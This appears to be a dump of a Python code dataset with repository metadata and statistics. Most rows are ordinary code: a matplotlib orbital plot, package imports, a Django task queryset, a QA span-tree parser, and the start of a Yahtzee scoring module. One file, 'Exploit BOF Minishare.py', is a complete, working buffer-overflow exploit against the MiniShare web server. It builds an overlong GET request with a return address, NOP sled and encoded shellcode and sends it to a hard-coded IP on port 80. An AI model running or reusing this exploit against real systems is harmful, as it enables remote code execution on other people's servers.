| 11.833333 | 36 | 0.760563 | 9 | 71 | 6 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.183099 | 71 | 5 | 37 | 14.2 | 0.931034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
6bb38fc1b3db701ffa917963d52f59f8c42babe5 | 3,031 | py | Python | 3rd Energy Level/3dPart2.py | aminoj/Interactive-Orbitals-Simulation | 20e405d6a23028049c05f4a0fd73e51857ba9270 | [
"Apache-2.0"
] | null | null | null | 3rd Energy Level/3dPart2.py | aminoj/Interactive-Orbitals-Simulation | 20e405d6a23028049c05f4a0fd73e51857ba9270 | [
"Apache-2.0"
] | null | null | null | 3rd Energy Level/3dPart2.py | aminoj/Interactive-Orbitals-Simulation | 20e405d6a23028049c05f4a0fd73e51857ba9270 | [
"Apache-2.0"
] | 1 | 2020-04-16T08:02:27.000Z | 2020-04-16T08:02:27.000Z | from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
import numpy as np
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
rstride = 15
cstride = 15
MinBound = -5
MaxBound = 5
u = np.linspace(0, 2*np.pi, 100)
v = np.linspace(0, np.pi, 100)
#-------------------------------------------------------------------------------
#Cone
x2 = 1.5*np.outer(np.cos(u), np.sin(v))
z2 = 1.5*np.outer(np.sin(u), np.sin(v))
y2 = 1.5*((1.5*x2)**2+(1.5*z2)**2+0.3)**(0.5)
ax.plot_surface(x2, y2, z2, rstride = rstride, cstride = cstride, linewidth=0, color=(0.8,1,0.8))
#-------------------------------------------------------------------------------
#Cone
x2 = 1.5*np.outer(np.cos(u), np.sin(v))
z2 = 1.5*np.outer(np.sin(u), np.sin(v))
y2 = -1.5*((1.5*x2)**2+(1.5*z2)**2+0.3)**(0.5)
ax.plot_surface(x2, y2, z2, rstride = rstride, cstride = cstride, color= (0.8,1,0.8), linewidth=0)
#-------------------------------------------------------------------------------
#Cover
x6 = 1.5*np.outer(np.cos(u), np.sin(v))
z6 = 1.5*np.outer(np.sin(u), np.sin(v))
y6 = (abs(((2*x6)**2)+((2*z6)**2)-15)**(0.5))+1
ax.plot_surface(x6, y6, z6, rstride = rstride, cstride = cstride, color=(0.8,1,0.8), linewidth=0)
#-------------------------------------------------------------------------------
#Cover
x6 = 1.5*np.outer(np.cos(u), np.sin(v))
z6 = 1.5*np.outer(np.sin(u), np.sin(v))
y6 = -(abs(((2*x6)**2)+((2*z6)**2)-15)**(0.5))-1
ax.plot_surface(x6, y6, z6, rstride = rstride, cstride = cstride, color=(0.8,1,0.8), linewidth=0)
'--------------------------------------------------------------------------------------------------------------------'
#-------------------------------------------------------------------------------
#Cone
y2 = 1.5*np.outer(np.cos(u), np.sin(v))
z2 = 1.5*np.outer(np.sin(u), np.sin(v))
x2 = 1.5*((1.5*y2)**2+(1.5*z2)**2+0.3)**(0.5)
ax.plot_surface(x2, y2, z2, rstride = rstride, cstride = cstride, linewidth=0, color=(0.8,1,0.8))
#-------------------------------------------------------------------------------
#Cone
y2 = 1.5*np.outer(np.cos(u), np.sin(v))
z2 = 1.5*np.outer(np.sin(u), np.sin(v))
x2 = -1.5*((1.5*y2)**2+(1.5*z2)**2+0.3)**(0.5)
ax.plot_surface(x2, y2, z2, rstride = rstride, cstride = cstride, color= (0.8,1,0.8), linewidth=0)
#-------------------------------------------------------------------------------
#Cover
y6 = 1.5*np.outer(np.cos(u), np.sin(v))
z6 = 1.5*np.outer(np.sin(u), np.sin(v))
x6 = (abs(((2*y6)**2)+((2*z6)**2)-15)**(0.5))+1
ax.plot_surface(x6, y6, z6, rstride = rstride, cstride = cstride, color=(0.8,1,0.8), linewidth=0)
#-------------------------------------------------------------------------------
#Cover
y6 = 1.5*np.outer(np.cos(u), np.sin(v))
z6 = 1.5*np.outer(np.sin(u), np.sin(v))
x6 = -(abs(((2*y6)**2)+((2*z6)**2)-15)**(0.5))-1
ax.plot_surface(x6, y6, z6, rstride = rstride, cstride = cstride, color=(0.8,1,0.8), linewidth=0)
plt.show()
ax.set_xlim3d(MaxBound, MinBound)
ax.set_ylim3d(MaxBound, MinBound)
ax.set_zlim3d(MaxBound, MinBound)
| 34.443182 | 118 | 0.454635 | 501 | 3,031 | 2.724551 | 0.113772 | 0.041026 | 0.046886 | 0.105495 | 0.794139 | 0.794139 | 0.794139 | 0.794139 | 0.794139 | 0.794139 | 0 | 0.091139 | 0.08776 | 3,031 | 87 | 119 | 34.83908 | 0.402532 | 0.220389 | 0 | 0.5 | 0 | 0 | 0.050277 | 0.049425 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.0625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6bda1f7325ba63145cc0ca57f0e8fdda66bcc867 | 25 | py | Python | paranuara/companies/serializers/__init__.py | SPLAYER-HD/Paranuara | 5a42f23d761e16e3b486ba04d9185551614f06a5 | [
"MIT"
] | null | null | null | paranuara/companies/serializers/__init__.py | SPLAYER-HD/Paranuara | 5a42f23d761e16e3b486ba04d9185551614f06a5 | [
"MIT"
] | 4 | 2021-06-08T20:53:43.000Z | 2022-03-12T00:13:51.000Z | paranuara/companies/serializers/__init__.py | SPLAYER-HD/RestServiceDjango | 5a42f23d761e16e3b486ba04d9185551614f06a5 | [
"MIT"
] | null | null | null | from .companies import *
| 12.5 | 24 | 0.76 | 3 | 25 | 6.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 1 | 25 | 25 | 0.904762 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6bdd1aae288e4e03382b31e27b9637b80db7101a | 138 | py | Python | allopy/optimize/regret/__init__.py | wangcj05/allopy | 0d97127e5132df1449283198143994b45fb11214 | [
"MIT"
] | 1 | 2021-04-06T04:33:03.000Z | 2021-04-06T04:33:03.000Z | allopy/optimize/regret/__init__.py | wangcj05/allopy | 0d97127e5132df1449283198143994b45fb11214 | [
"MIT"
] | null | null | null | allopy/optimize/regret/__init__.py | wangcj05/allopy | 0d97127e5132df1449283198143994b45fb11214 | [
"MIT"
] | null | null | null | from .active import ActivePortfolioRegretOptimizer
from .optimizer import RegretOptimizer
from .portfolio import PortfolioRegretOptimizer
| 34.5 | 50 | 0.891304 | 12 | 138 | 10.25 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086957 | 138 | 3 | 51 | 46 | 0.97619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6be6db3f7cba5e349caddb65cd3b434181747349 | 57 | py | Python | operadores basicos/division2.py | gabys12/portafolio-fundamento-de-programacion | c9b47f32e885ed6ae80b14133a609798ea034e19 | [
"CNRI-Python"
] | null | null | null | operadores basicos/division2.py | gabys12/portafolio-fundamento-de-programacion | c9b47f32e885ed6ae80b14133a609798ea034e19 | [
"CNRI-Python"
] | null | null | null | operadores basicos/division2.py | gabys12/portafolio-fundamento-de-programacion | c9b47f32e885ed6ae80b14133a609798ea034e19 | [
"CNRI-Python"
] | null | null | null | a = 57
b = 1.5
c = 60.24
print("a / b / c =",a / b / c)
| 9.5 | 30 | 0.385965 | 15 | 57 | 1.466667 | 0.6 | 0.181818 | 0.272727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.216216 | 0.350877 | 57 | 5 | 31 | 11.4 | 0.378378 | 0 | 0 | 0 | 0 | 0 | 0.192982 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.25 | 1 | 0 | 1 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d4115beafd073ebb473dd7ed0112123910233b80 | 58 | py | Python | yo_indexer/__init__.py | LTibbetts/yo-indexer | 6d77807544cfeb54b24caa804e6b8d0976fcaafa | [
"MIT"
] | 1 | 2021-08-14T11:54:30.000Z | 2021-08-14T11:54:30.000Z | yo_indexer/__init__.py | LTibbetts/yo-indexer | 6d77807544cfeb54b24caa804e6b8d0976fcaafa | [
"MIT"
] | null | null | null | yo_indexer/__init__.py | LTibbetts/yo-indexer | 6d77807544cfeb54b24caa804e6b8d0976fcaafa | [
"MIT"
] | 1 | 2017-11-30T22:35:48.000Z | 2017-11-30T22:35:48.000Z | """init for yo_indexer"""
from yo_indexer import analyzer
| 19.333333 | 31 | 0.775862 | 9 | 58 | 4.777778 | 0.777778 | 0.418605 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12069 | 58 | 2 | 32 | 29 | 0.843137 | 0.327586 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d41574b679c29eab33c404bb9f923842c709cd37 | 23 | py | Python | __init__.py | Kindos7/feld | 88f92a0583e6f346ad6009e91c14a05d5310fb50 | [
"MIT"
] | null | null | null | __init__.py | Kindos7/feld | 88f92a0583e6f346ad6009e91c14a05d5310fb50 | [
"MIT"
] | null | null | null | __init__.py | Kindos7/feld | 88f92a0583e6f346ad6009e91c14a05d5310fb50 | [
"MIT"
] | null | null | null | from .feld import Feld
| 11.5 | 22 | 0.782609 | 4 | 23 | 4.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 23 | 1 | 23 | 23 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d44868a07e0eddb3b4c77d49962d16526eaf3fef | 185 | py | Python | dataset.py | yepedraza/hm-class-nn | 08e9bbd9c2c9ff7faeeb6c317aea16e434d1b233 | [
"MIT"
] | null | null | null | dataset.py | yepedraza/hm-class-nn | 08e9bbd9c2c9ff7faeeb6c317aea16e434d1b233 | [
"MIT"
] | null | null | null | dataset.py | yepedraza/hm-class-nn | 08e9bbd9c2c9ff7faeeb6c317aea16e434d1b233 | [
"MIT"
] | null | null | null | class Dataset:
x_train = []
y_train = []
x_test = []
y_test = []
def __init__(self, x_train, y_train):
self.x_train = x_train
self.y_train = y_train | 20.555556 | 41 | 0.556757 | 27 | 185 | 3.296296 | 0.333333 | 0.269663 | 0.370787 | 0.269663 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.324324 | 185 | 9 | 42 | 20.555556 | 0.712 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
2e38a55faef529923807a338d221765dc317f09d | 2,038 | py | Python | Exploit BOF Minishare.py | JAYMONSECURITY/JMSec-Blog-Resources | 61bcab0cbfceab8d46c039f5a5165b8f9da6737f | [
"MIT"
] | 2 | 2021-09-08T23:57:47.000Z | 2022-02-15T09:58:36.000Z | Exploit BOF Minishare.py | JAYMONSECURITY/JMSec-Blog-Resources | 61bcab0cbfceab8d46c039f5a5165b8f9da6737f | [
"MIT"
] | null | null | null | Exploit BOF Minishare.py | JAYMONSECURITY/JMSec-Blog-Resources | 61bcab0cbfceab8d46c039f5a5165b8f9da6737f | [
"MIT"
] | 2 | 2021-09-09T13:42:12.000Z | 2022-02-15T23:39:02.000Z | #!/usr/share/python
import socket
buf = b""
buf += b"\xb8\x1f\xf5\x98\xea\xdb\xd3\xd9\x74\x24\xf4\x5a\x31"
buf += b"\xc9\xb1\x52\x31\x42\x12\x83\xc2\x04\x03\x5d\xfb\x7a"
buf += b"\x1f\x9d\xeb\xf9\xe0\x5d\xec\x9d\x69\xb8\xdd\x9d\x0e"
buf += b"\xc9\x4e\x2e\x44\x9f\x62\xc5\x08\x0b\xf0\xab\x84\x3c"
buf += b"\xb1\x06\xf3\x73\x42\x3a\xc7\x12\xc0\x41\x14\xf4\xf9"
buf += b"\x89\x69\xf5\x3e\xf7\x80\xa7\x97\x73\x36\x57\x93\xce"
buf += b"\x8b\xdc\xef\xdf\x8b\x01\xa7\xde\xba\x94\xb3\xb8\x1c"
buf += b"\x17\x17\xb1\x14\x0f\x74\xfc\xef\xa4\x4e\x8a\xf1\x6c"
buf += b"\x9f\x73\x5d\x51\x2f\x86\x9f\x96\x88\x79\xea\xee\xea"
buf += b"\x04\xed\x35\x90\xd2\x78\xad\x32\x90\xdb\x09\xc2\x75"
buf += b"\xbd\xda\xc8\x32\xc9\x84\xcc\xc5\x1e\xbf\xe9\x4e\xa1"
buf += b"\x6f\x78\x14\x86\xab\x20\xce\xa7\xea\x8c\xa1\xd8\xec"
buf += b"\x6e\x1d\x7d\x67\x82\x4a\x0c\x2a\xcb\xbf\x3d\xd4\x0b"
buf += b"\xa8\x36\xa7\x39\x77\xed\x2f\x72\xf0\x2b\xa8\x75\x2b"
buf += b"\x8b\x26\x88\xd4\xec\x6f\x4f\x80\xbc\x07\x66\xa9\x56"
buf += b"\xd7\x87\x7c\xf8\x87\x27\x2f\xb9\x77\x88\x9f\x51\x9d"
buf += b"\x07\xff\x42\x9e\xcd\x68\xe8\x65\x86\x56\x45\xbb\xd3"
buf += b"\x3f\x94\x43\xdd\x04\x11\xa5\xb7\x6a\x74\x7e\x20\x12"
buf += b"\xdd\xf4\xd1\xdb\xcb\x71\xd1\x50\xf8\x86\x9c\x90\x75"
buf += b"\x94\x49\x51\xc0\xc6\xdc\x6e\xfe\x6e\x82\xfd\x65\x6e"
buf += b"\xcd\x1d\x32\x39\x9a\xd0\x4b\xaf\x36\x4a\xe2\xcd\xca"
buf += b"\x0a\xcd\x55\x11\xef\xd0\x54\xd4\x4b\xf7\x46\x20\x53"
buf += b"\xb3\x32\xfc\x02\x6d\xec\xba\xfc\xdf\x46\x15\x52\xb6"
buf += b"\x0e\xe0\x98\x09\x48\xed\xf4\xff\xb4\x5c\xa1\xb9\xcb"
buf += b"\x51\x25\x4e\xb4\x8f\xd5\xb1\x6f\x14\xe5\xfb\x2d\x3d"
buf += b"\x6e\xa2\xa4\x7f\xf3\x55\x13\x43\x0a\xd6\x91\x3c\xe9"
buf += b"\xc6\xd0\x39\xb5\x40\x09\x30\xa6\x24\x2d\xe7\xc7\x6c"
princi_buffer="GET "+ "\x41"*1787 + "\xD7\x30\x9D\x7C" + "\x90"*20 + buf + " HTTP/1.1\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.222.134", 80))
sock.send(princi_buffer)
sock.recv(1024)
sock.close()
| 47.395349 | 95 | 0.665849 | 456 | 2,038 | 2.967105 | 0.489035 | 0.082779 | 0.010347 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.241893 | 0.077036 | 2,038 | 42 | 96 | 48.52381 | 0.477406 | 0.008832 | 0 | 0 | 0 | 0.771429 | 0.741266 | 0.710886 | 0.028571 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.028571 | 0 | 0.028571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2e6b77ebe0d8a404eeacc575e5cc8639848616d0 | 45 | py | Python | pysedm/script/__init__.py | MickaelRigault/pysedm | 5d34d3a6b48eb3bbb7ba9d89b88b4b5b1ff09624 | [
"Apache-2.0"
] | 5 | 2018-03-16T14:58:09.000Z | 2019-11-25T15:57:14.000Z | pysedm/script/__init__.py | MickaelRigault/pysedm | 5d34d3a6b48eb3bbb7ba9d89b88b4b5b1ff09624 | [
"Apache-2.0"
] | 9 | 2018-02-13T17:02:17.000Z | 2020-09-15T11:43:37.000Z | pysedm/script/__init__.py | MickaelRigault/pysedm | 5d34d3a6b48eb3bbb7ba9d89b88b4b5b1ff09624 | [
"Apache-2.0"
] | 4 | 2018-03-16T14:58:14.000Z | 2022-02-07T20:02:58.000Z | """ Scripts """
from .ccd_to_cube import *
| 9 | 26 | 0.622222 | 6 | 45 | 4.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 45 | 4 | 27 | 11.25 | 0.722222 | 0.155556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2e8c139aa592e5bb74d359a36bffe315d1c9fe52 | 1,834 | py | Python | src/task/queries.py | Echeverrias/IE | 24c55f5338d9e9270bbed5af76730bf893891349 | [
"MIT"
] | 2 | 2019-11-28T02:42:25.000Z | 2020-03-05T01:13:40.000Z | src/task/queries.py | Echeverrias/IE | 24c55f5338d9e9270bbed5af76730bf893891349 | [
"MIT"
] | 22 | 2019-12-04T23:41:12.000Z | 2022-03-02T14:58:20.000Z | src/task/queries.py | Echeverrias/IE | 24c55f5338d9e9270bbed5af76730bf893891349 | [
"MIT"
] | 1 | 2020-03-05T01:13:43.000Z | 2020-03-05T01:13:43.000Z | from django.db import models
from django.db.models import Q, F, Count
from datetime import date
TYPE_CRAWLER = 'Crawler'
STATE_FINISHED = 'Terminada'
class TaskQuerySet(models.QuerySet):
def crawler_tasks(self):
return self.filter(type__iexact=TYPE_CRAWLER)
def finished_crawler_tasks(self):
return self.filter(type__iexact=TYPE_CRAWLER).filter(state__iexact=STATE_FINISHED)
def get_latest_crawler_task(self):
try:
return self.crawler_tasks().latest('created_at')
except Exception as e:
return None
def get_latest_crawler_tasks(self):
try:
distinct = self.crawler_tasks().values('name').order_by('name').annotate(name_count=Count('name'))
names = [name.get('name') for name in distinct]
tasks = [self.crawler_tasks().filter(name=name).latest('created_at') for name in names]
pks = [task.pk for task in tasks if task]
qs = self.filter(pk__in=pks).order_by('created_at')
return qs
except Exception as e:
return self.none()
def get_latest_finished_crawler_task(self):
try:
return self.finished_crawler_tasks().latest('created_at')
except Exception as e:
return None
def get_latest_finished_crawler_tasks(self):
try:
distinct = self.crawler_tasks().values('name').order_by('name').annotate(name_count=Count('name'))
names = [name.get('name') for name in distinct]
tasks = [ self.finished_crawler_tasks().filter(name=name).latest('created_at') for name in names]
pks = [task.pk for task in tasks if task]
qs = self.filter(pk__in=pks).order_by('created_at')
return qs
except Exception as e:
return self.none() | 38.208333 | 110 | 0.642312 | 241 | 1,834 | 4.672199 | 0.19917 | 0.106572 | 0.056838 | 0.063943 | 0.804618 | 0.804618 | 0.730018 | 0.730018 | 0.730018 | 0.730018 | 0 | 0 | 0.252454 | 1,834 | 48 | 111 | 38.208333 | 0.821298 | 0 | 0 | 0.55 | 0 | 0 | 0.058856 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.15 | false | 0 | 0.075 | 0.05 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2e8cb0929a4a853a9828c8240b46bd8edb783383 | 6,262 | py | Python | code/parsing/skeleton_parser.py | mdheller/SPARQA | 3678798491abeb350d9500182291b9a73da75bed | [
"MIT"
] | 1 | 2020-06-20T12:27:11.000Z | 2020-06-20T12:27:11.000Z | code/parsing/skeleton_parser.py | mdheller/SPARQA | 3678798491abeb350d9500182291b9a73da75bed | [
"MIT"
] | null | null | null | code/parsing/skeleton_parser.py | mdheller/SPARQA | 3678798491abeb350d9500182291b9a73da75bed | [
"MIT"
] | null | null | null | from common_structs.skeleton import SpanTree
from parsing.models.fine_tuning_based_on_bert_interface import redundancy_span_interface
from parsing.models.fine_tuning_based_on_bert_interface import sequences_classifier_interface
from parsing.models.fine_tuning_based_on_bert_interface import headword_span_interface
from parsing.models.fine_tuning_based_on_bert_interface import simplif_classifier_interface
from parsing import parsing_utils
def span_tree_generation_only_dep(tokens):
span_tree = SpanTree(tokens=tokens)
span_tree.add_span_node(id=0, head_tail_position=[0, len(tokens)], isRoot=True, tokens=tokens)
return span_tree
def span_tree_generation_head(tokens):
'''
产生叶子顶点
产生非叶子顶点
每个树的顶点, 视为tokens列表
边: 视为顶点与另一顶点内的某个token之间关系.
'''
epoch = 0
span_tree = SpanTree(tokens=tokens)
root_span_node = span_tree.add_span_node(id=0, head_tail_position=[0, len(tokens)], isRoot=True, tokens=tokens)
while simplif_classifier_interface.process(root_span_node.content) == 1:
epoch = epoch + 1
if epoch > 10:
break
# --------------------------------------
redundancy_span, redundancy_nbest_json = redundancy_span_interface.simple_process(root_span_node.content)
if redundancy_span is None or redundancy_span == 'empty' or redundancy_nbest_json is None or len(root_span_node.tokens) - len(redundancy_span.split(' ')) <= 3:
#heuristic rule, 如果删除以后, tokens数量小于4 超过10轮的迭代, 就退出
break
# -----------------head---------------------
headword_index, _ = headword_span_interface.simple_process(question=root_span_node.content, span=redundancy_span)
#update headword index, based on complete sequence
headword_index = parsing_utils.update_headword_index(tokens=root_span_node.tokens, headword_index=headword_index)
# ---------------span position--------------# look for position in utterance
start_index, end_index = parsing_utils.look_for_position(redundancy_span, root_span_node)
if start_index > end_index:
break
sub_tokens = parsing_utils.get_sub_tokens(root_span_node.tokens, start_index=start_index, end_index=end_index)
sub_span_node = span_tree.add_span_node(id=epoch, head_tail_position=[start_index, end_index], tokens=sub_tokens, isRoot=False)
# --------------------------------------
#增长树结构: 判断是叶子顶点还是非叶子顶点.
#span node部分是不是有其他node的根, 如果有, 则为非叶子顶点; 否则, 则为叶子顶点.
if not parsing_utils.is_leaf(span_tree=span_tree, span_node=sub_span_node):
#非叶子顶点, 等价于插入顶点
parsing_utils.update_span_tree_structure(span_tree=span_tree, sub_span_node=sub_span_node)
# -------------------relation classifier 检测修饰关系-------------------
relation = sequences_classifier_interface.process(line_a=root_span_node.content, line_b=redundancy_span)
# --------------------------------------
# print('###:\t', root_span_node.content)
# print('####:\tspan:', redundancy_span, 'headword_index:', headword_index, 'rel_index:', relation)
span_tree.add_child_rel_with_headword(father_id=root_span_node.id, son_id=sub_span_node.id, headword_position=headword_index, headword_relation=relation)
# --------------------------------------
parsing_utils.update_span_tree_nodes(span_tree=root_span_node, start_index=start_index, end_index=end_index)
# --------------------------------------
return span_tree
def span_tree_generation_joint__(tokens):
'''
产生叶子顶点
产生非叶子顶点
每个树的顶点, 视为tokens列表
边: 视为顶点与另一顶点内的某个token之间关系.
'''
from parsing.models.fine_tuning_based_on_bert_interface import joint_three_models_interface
epoch = 0
span_tree = SpanTree(tokens=tokens)
root_span_node = span_tree.add_span_node(id=0, head_tail_position=[0, len(tokens)], isRoot=True, tokens=tokens)
while simplif_classifier_interface.process(root_span_node.content) == 1:
epoch = epoch + 1
if epoch > 10:
break
# --------------------------------------
redundancy_span, headword_index, relation, redundancy_nbest_json = joint_three_models_interface.simple_process(root_span_node.content)
if redundancy_span is None or redundancy_span == 'empty' or redundancy_nbest_json is None or len(root_span_node.tokens)-len(redundancy_span.split(' '))<=3:
#heuristic rule, 如果删除以后, tokens数量小于4 超过10轮的迭代, 就退出
break
# -----------------head---------------------
#update headword index, based on complete sequence
headword_index = parsing_utils.update_headword_index(tokens=root_span_node.tokens, headword_index=headword_index)
# ---------------span position--------------
# look for position in utterance
start_index, end_index = parsing_utils.look_for_position(redundancy_span, root_span_node)
if start_index > end_index: break
# --------------------------------------
# reg nodes
sub_tokens = parsing_utils.get_sub_tokens(root_span_node.tokens, start_index=start_index, end_index=end_index)
sub_span_node = span_tree.add_span_node(id=epoch, head_tail_position=[start_index, end_index], tokens=sub_tokens, isRoot=False)
#增长树结构: 判断是叶子顶点还是非叶子顶点.
#span node部分是不是有其他node的根, 如果有, 则为非叶子顶点; 否则, 则为叶子顶点.
if not parsing_utils.is_leaf(span_tree=span_tree, span_node=sub_span_node): #非叶子顶点, 等价于插入顶点
parsing_utils.update_span_tree_structure(span_tree=span_tree, sub_span_node=sub_span_node)
# print('###:\t', root_span_node.content)
# print('####:\tspan:', redundancy_span, 'headword_index:', headword_index, 'rel_index:', relation)
span_tree.add_child_rel_with_headword(father_id=root_span_node.id, son_id=sub_span_node.id,
headword_position=headword_index, headword_relation=relation)
# ---update root span node
parsing_utils.update_span_tree_nodes(span_tree=root_span_node, start_index=start_index, end_index=end_index)
# --------------------------------------
return span_tree
| 60.796117 | 168 | 0.666241 | 754 | 6,262 | 5.132626 | 0.147215 | 0.082687 | 0.071318 | 0.046512 | 0.866667 | 0.859432 | 0.859432 | 0.814987 | 0.814987 | 0.814987 | 0 | 0.004702 | 0.184925 | 6,262 | 102 | 169 | 61.392157 | 0.753527 | 0.223251 | 0 | 0.649123 | 0 | 0 | 0.002574 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.122807 | 0 | 0.22807 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5cf8052e0709de8f2760f2e458d03741bea0cf3b | 29,223 | py | Python | yahtzee/scoring/rules.py | augustopher/yahtzee | 58c292753733286c223a045926e8554c9fb358ee | [
"MIT"
] | null | null | null | yahtzee/scoring/rules.py | augustopher/yahtzee | 58c292753733286c223a045926e8554c9fb358ee | [
"MIT"
] | 11 | 2021-07-17T20:17:27.000Z | 2021-08-07T00:34:35.000Z | yahtzee/scoring/rules.py | augustopher/yahtzee | 58c292753733286c223a045926e8554c9fb358ee | [
"MIT"
] | null | null | null | from ..dice import DiceList
from . import validators as vl
from .. import errors as er
from abc import ABC, abstractmethod
from enum import Enum
from typing import List, Optional
# scores that are constant, regardless of dice values
SCORE_FULL_HOUSE: int = 25
SCORE_SMALL_STRAIGHT: int = 30
SCORE_LARGE_STRAIGHT: int = 40
SCORE_YAHTZEE: int = 50
BONUS_UPPER_SCORE = 35
BONUS_UPPER_THRESHOLD = 63
BONUS_YAHTZEE_SCORE = 100
BONUS_LOWER_SCORE = BONUS_YAHTZEE_SCORE
class Section(Enum):
"""Values for the sections of the scoresheet,
used to organize different rules and bonuses."""
UPPER: str = "upper"
LOWER: str = "lower"
class ScoringRule(ABC):
"""Generic scoring rule.
Parameters
